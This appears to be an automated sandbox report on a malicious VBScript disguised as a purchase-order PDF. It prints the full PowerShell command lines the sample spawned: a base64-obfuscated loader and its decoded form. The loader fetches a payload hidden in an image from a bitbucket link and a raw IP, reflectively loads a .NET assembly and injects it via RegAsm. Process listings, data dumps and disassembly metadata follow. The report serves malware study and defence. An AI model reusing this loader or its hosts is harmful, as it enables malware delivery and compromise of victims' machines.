                                                                                        2024-11-14 07:15:40 UTC1378INData Raw: 78 72 53 50 63 38 65 72 54 67 44 6f 53 33 53 37 59 6c 73 41 6c 71 62 4c 35 33 66 75 30 33 63 35 38 64 35 4a 6f 68 41 6e 76 57 74 6d 6f 30 30 72 79 6c 78 45 66 56 72 51 55 70 43 45 73 48 33 4b 57 65 72 54 67 44 6e 41 73 54 47 69 55 73 4f 54 37 54 55 41 77 53 72 4f 67 68 47 5a 31 46 41 4d 56 2f 6d 77 36 57 63 62 30 32 4b 57 46 6d 4c 70 4a 61 4f 6d 6e 42 42 4e 64 58 37 75 38 49 65 51 73 67 73 4b 36 62 66 47 71 71 55 2f 6a 47 2f 30 35 30 53 41 6d 2f 55 57 34 66 63 46 65 52 5a 31 72 55 41 45 64 4d 37 58 37 59 6a 74 50 76 47 42 59 30 49 56 4f 70 6f 67 79 37 79 53 45 41 72 4b 33 65 65 72 54 67 44 52 67 68 49 4b 50 62 72 33 43 37 7a 78 79 75 59 73 2f 44 62 50 49 70 50 6d 41 58 49 65 4e 32 68 52 46 79 6a 53 44 44 73 5a 68 6c 64 66 6b 52 79 54 4e 7a 61 4f 30 32 45
                                                                                        Data Ascii: xrSPc8erTgDoS3S7YlsAlqbL53fu03c58d5JohAnvWtmo00rylxEfVrQUpCEsH3KWerTgDnAsTGiUsOT7TUAwSrOghGZ1FAMV/mw6Wcb02KWFmLpJaOmnBBNdX7u8IeQsgsK6bfGqqU/jG/050SAm/UW4fcFeRZ1rUAEdM7X7YjtPvGBY0IVOpogy7ySEArK3eerTgDRghIKPbr3C7zxyuYs/DbPIpPmAXIeN2hRFyjSDDsZhldfkRyTNzaO02E
                                                                                        2024-11-14 07:15:40 UTC1378INData Raw: 43 47 6d 66 30 6d 44 74 70 42 30 4c 65 72 54 67 44 58 2f 6d 4f 6e 72 51 35 35 58 66 39 78 49 4c 71 53 73 53 41 4e 56 69 5a 51 63 4b 77 31 4a 36 4c 70 57 51 62 37 70 43 6d 76 65 2f 66 56 39 68 32 6d 70 74 58 4f 4f 2f 69 63 34 6d 48 71 4c 6c 38 4a 5a 44 76 38 54 48 47 61 7a 57 68 35 57 71 51 58 6e 4f 39 33 4c 45 6b 6f 4b 4e 4c 67 66 34 31 32 43 33 53 4b 30 79 4f 37 6e 54 6b 46 33 67 77 42 41 59 65 72 54 67 44 66 53 6c 38 73 72 42 7a 30 71 56 35 51 4f 70 6c 4d 51 57 50 37 50 49 74 48 6f 30 41 65 72 54 67 44 65 72 54 67 44 6c 59 41 57 55 45 50 65 49 55 70 53 6d 50 53 79 56 67 79 41 65 72 54 67 44 43 69 54 31 39 34 32 5a 70 77 36 66 78 61 6f 59 41 43 70 62 57 73 4e 6a 7a 7a 4c 46 79 4b 34 77 55 42 43 4b 54 61 76 4f 51 31 63 67 59 79 51 56 63 76 68 39 55 65 72
                                                                                        Data Ascii: CGmf0mDtpB0LerTgDX/mOnrQ55Xf9xILqSsSANViZQcKw1J6LpWQb7pCmve/fV9h2mptXOO/ic4mHqLl8JZDv8THGazWh5WqQXnO93LEkoKNLgf412C3SK0yO7nTkF3gwBAYerTgDfSl8srBz0qV5QOplMQWP7PItHo0AerTgDerTgDlYAWUEPeIUpSmPSyVgyAerTgDCiT1942Zpw6fxaoYACpbWsNjzzLFyK4wUBCKTavOQ1cgYyQVcvh9Uer


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:02:15:29
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs"
                                                                                        Imagebase:0x7ff72cc30000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:02:15:30
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$FM$dQBi$HM$d$By$Gk$bgBn$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Cw$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GM$bwBt$G0$YQBu$GQ$QgB5$HQ$ZQBz$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBD$G8$bgB2$GU$cgB0$F0$Og$6$EY$cgBv$G0$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$KQ$7$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$FI$ZQBm$Gw$ZQBj$HQ$aQBv$G4$LgBB$HM$cwBl$G0$YgBs$Hk$XQ$6$Do$T$Bv$GE$Z$$o$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$KQ$7$C$$J$B0$Hk$c$Bl$C$$PQ$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C4$RwBl$HQ$V$B5$H$$ZQ$o$Cc$d$Bl$HM$d$Bw$G8$dwBl$HI$cwBo$GU$b$Bs$C4$S$Bv$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bh$Cc$KQ$u$Ek$bgB2$G8$awBl$Cg$J$Bu$HU$b$Bs$Cw$I$Bb$G8$YgBq$GU$YwB0$Fs$XQBd$C$$K$$n$HQ$e$B0$C4$YwBi$G8$awBp$GQ$ag$v$G4$aQBh$G0$LwBz$GQ$YQBl$Gg$LwBz$GY$ZQBy$C8$aQBu$GE$Lw$z$DE$MgBl$Gk$a$Bj$Gk$cg$v$G0$bwBj$C4$d$Bu$GU$d$Bu$G8$YwBy$GU$cwB1$GI$dQBo$HQ$aQBn$C4$dwBh$HI$Lw$v$Do$cwBw$HQ$d$Bo$Cc$L$$g$Cc$M$$n$Cw$I$$n$FM$d$Bh$HI$d$B1$H$$TgBh$G0$ZQ$n$Cw$I$$n$FI$ZQBn$EE$cwBt$Cc$L$$g$Cc$M$$n$Ck$KQB9$H0$';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:02:15:30
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:02:15:32
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:02:15:40
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xfa0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:02:15:59
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe"
                                                                                        Imagebase:0xb0000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:02:16:00
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Windows\SysWOW64\where.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\where.exe"
                                                                                        Imagebase:0x870000
                                                                                        File size:33'280 bytes
                                                                                        MD5 hash:5630411B5F4F453CA575248F7AD4C89F
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:02:16:14
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe"
                                                                                        Imagebase:0xb0000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:02:16:26
                                                                                        Start date:14/11/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:0x7ff79f9e0000
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Executed Functions

                                                                                          Function 00007FF848E937B5 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2652943426.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848e90000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                          • Instruction ID: 4f6d13a1e641f644b83a0d5b89e1e045fb9419d8f6b4001dfd04de57bab85d14
                                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                          • Instruction Fuzzy Hash: FF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661D736E882CB45

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.5%
                                                                                          Dynamic/Decrypted Code Coverage:4.7%
                                                                                          Signature Coverage:7.4%
                                                                                          Total number of Nodes:149
                                                                                          Total number of Limit Nodes:12
                                                                                          execution_graph 75654 424f43 75655 424f5f 75654->75655 75656 424f87 75655->75656 75657 424f9b 75655->75657 75658 42ccc3 NtClose 75656->75658 75664 42ccc3 75657->75664 75661 424f90 75658->75661 75660 424fa4 75667 42ee83 RtlAllocateHeap 75660->75667 75663 424faf 75665 42cce0 75664->75665 75666 42ccf1 NtClose 75665->75666 75666->75660 75667->75663 75668 42fe63 75671 42ed63 75668->75671 75674 42d023 75671->75674 75673 42ed7c 75675 42d03d 75674->75675 75676 42d04e RtlFreeHeap 75675->75676 75676->75673 75677 42fe03 75678 42fe13 75677->75678 75679 42fe19 75677->75679 75682 42ee43 75679->75682 75681 42fe3f 75685 42cfd3 75682->75685 75684 42ee5e 75684->75681 75686 42cfed 75685->75686 75687 42cffe RtlAllocateHeap 75686->75687 75687->75684 75688 3232b60 LdrInitializeThunk 75689 401b26 75690 401b33 75689->75690 75693 4302d3 75690->75693 75691 401c28 75691->75691 75696 42e923 75693->75696 75697 42e949 75696->75697 75708 4074d3 75697->75708 75699 42e95f 75707 42e9bb 75699->75707 75711 41b603 75699->75711 75701 42e97e 75704 42e993 75701->75704 75726 42d073 75701->75726 75722 428803 75704->75722 75705 42e9ad 75706 42d073 ExitProcess 75705->75706 75706->75707 75707->75691 75709 4074e0 75708->75709 75729 4169e3 75708->75729 75709->75699 75712 41b62f 75711->75712 75747 41b4f3 75712->75747 75715 41b674 75718 41b690 75715->75718 75720 42ccc3 NtClose 75715->75720 75716 41b65c 75717 41b667 75716->75717 75719 42ccc3 NtClose 75716->75719 75717->75701 75718->75701 75719->75717 75721 41b686 75720->75721 75721->75701 75723 428865 75722->75723 75725 428872 75723->75725 75758 418b73 75723->75758 75725->75705 75727 42d08d 75726->75727 75728 42d09e ExitProcess 75727->75728 75728->75704 75730 4169fa 75729->75730 75732 416a13 75730->75732 75733 42d703 75730->75733 75732->75709 75735 42d71d 75733->75735 75734 42d74c 75734->75732 75735->75734 75740 42c2c3 75735->75740 75738 42ed63 RtlFreeHeap 75739 42d7bf 75738->75739 75739->75732 75741 42c2dd 75740->75741 75744 3232c0a 75741->75744 75742 42c309 75742->75738 75745 3232c11 75744->75745 75746 3232c1f LdrInitializeThunk 75744->75746 75745->75742 75746->75742 75748 41b5e9 75747->75748 75749 41b50d 75747->75749 75748->75715 75748->75716 75753 42c363 75749->75753 75752 42ccc3 NtClose 75752->75748 75754 42c380 75753->75754 75757 32335c0 LdrInitializeThunk 75754->75757 75755 41b5dd 75755->75752 75757->75755 75759 418b9d 75758->75759 75765 41909b 75759->75765 75766 4141d3 75759->75766 75761 418cca 75762 42ed63 RtlFreeHeap 75761->75762 75761->75765 75763 418ce2 75762->75763 75764 42d073 ExitProcess 75763->75764 75763->75765 75764->75765 75765->75725 75767 4141f3 75766->75767 75769 41425c 75767->75769 75771 41b913 RtlFreeHeap LdrInitializeThunk 75767->75771 75769->75761 75770 414252 75770->75761 75771->75770 75772 429153 75773 4291b8 75772->75773 75774 4291ef 75773->75774 75777 424983 75773->75777 75776 4291d1 75778 4249c1 75777->75778 75779 424b13 75778->75779 75780 424b28 75778->75780 75781 42ccc3 NtClose 75779->75781 75782 42ccc3 NtClose 75780->75782 75783 424b1c 75781->75783 75785 424b31 75782->75785 75783->75776 75784 424b68 75784->75776 75785->75784 75786 42ed63 RtlFreeHeap 75785->75786 75787 424b5c 75786->75787 75787->75776 75788 42c273 75789 42c28d 75788->75789 75792 3232df0 LdrInitializeThunk 75789->75792 75790 42c2b5 75792->75790 75793 4252d3 75797 4252ec 75793->75797 75794 425379 75795 425334 75796 42ed63 RtlFreeHeap 75795->75796 75798 425344 75796->75798 75797->75794 75797->75795 75799 425374 75797->75799 75800 42ed63 RtlFreeHeap 75799->75800 75800->75794 75801 414573 75802 41457e 75801->75802 75807 417d03 75802->75807 75804 4145ab 75805 4145f0 75804->75805 75806 4145df PostThreadMessageW 75804->75806 75806->75805 75808 417d27 75807->75808 75809 417d63 LdrLoadDll 75808->75809 75810 417d2e 75808->75810 75809->75810 75810->75804 75811 41b7f3 75812 41b837 75811->75812 75813 42ccc3 NtClose 75812->75813 75814 41b858 75812->75814 75813->75814 75815 413ff3 75816 414012 75815->75816 75818 42cf43 75815->75818 75819 42cf60 75818->75819 75822 3232c70 LdrInitializeThunk 75819->75822 75820 42cf88 75820->75816 75822->75820 75823 41aa93 75824 41aaab 75823->75824 75826 41ab05 75823->75826 75824->75826 75827 41ea03 75824->75827 75828 41ea29 75827->75828 75832 41eb20 75828->75832 75833 42fea3 RtlAllocateHeap RtlFreeHeap 75828->75833 75830 41eabe 75831 42c2c3 LdrInitializeThunk 75830->75831 75830->75832 75831->75832 75832->75826 75833->75830 75834 4192b5 75835 42ccc3 NtClose 75834->75835 75836 4192bf 75835->75836

                                                                                          Executed Functions

                                                                                          Function 00417D03 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 91 417d03-417d1f 92 417d27-417d2c 91->92 93 417d22 call 42f943 91->93 94 417d32-417d40 call 42ff43 92->94 95 417d2e-417d31 92->95 93->92 98 417d50-417d61 call 42e3f3 94->98 99 417d42-417d4d call 4301e3 94->99 104 417d63-417d77 LdrLoadDll 98->104 105 417d7a-417d7d 98->105 99->98 104->105
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417D75
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 85fc3f34ef3a3ea4a960e2fe967ebaecc5d053134b9e607797a2ee47c5dc3fad
                                                                                          • Instruction ID: 4f1fda45716572067d10f344df9ac21823cae23fc483b08bda96b3a2ef200833
                                                                                          • Opcode Fuzzy Hash: 85fc3f34ef3a3ea4a960e2fe967ebaecc5d053134b9e607797a2ee47c5dc3fad
                                                                                          • Instruction Fuzzy Hash: 770152B1E0010DA7DF10DBE5EC42FDEB7789F54308F0041A6E90897240F635EB488B95
                                                                                          Function 0042CCC3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 111 42ccc3-42ccff call 404863 call 42dee3 NtClose
                                                                                          APIs
                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCFA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: ef56e0d6ff410ec42d3ddcca9f09aa21b67c8698588f02a01d4b38a042423b04
                                                                                          • Instruction ID: 9b976683f62112ddf464f2206b9a23d774dfd6f1647250159d65b84f285fc844
                                                                                          • Opcode Fuzzy Hash: ef56e0d6ff410ec42d3ddcca9f09aa21b67c8698588f02a01d4b38a042423b04
                                                                                          • Instruction Fuzzy Hash: D5E086362002147BD210FB5AEC41F9B776CDFC5714F414819FA096B241C671B901C7F4
                                                                                          Function 032335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f2dec7003d1bade49adf7a2960007ee76a3fed89c1568b0ec281b0a8c128e07e
                                                                                          • Instruction ID: a05341b3eb3e8a9095af41116c64910e55cb874317e8d3d26d9fba5c0beb20c3
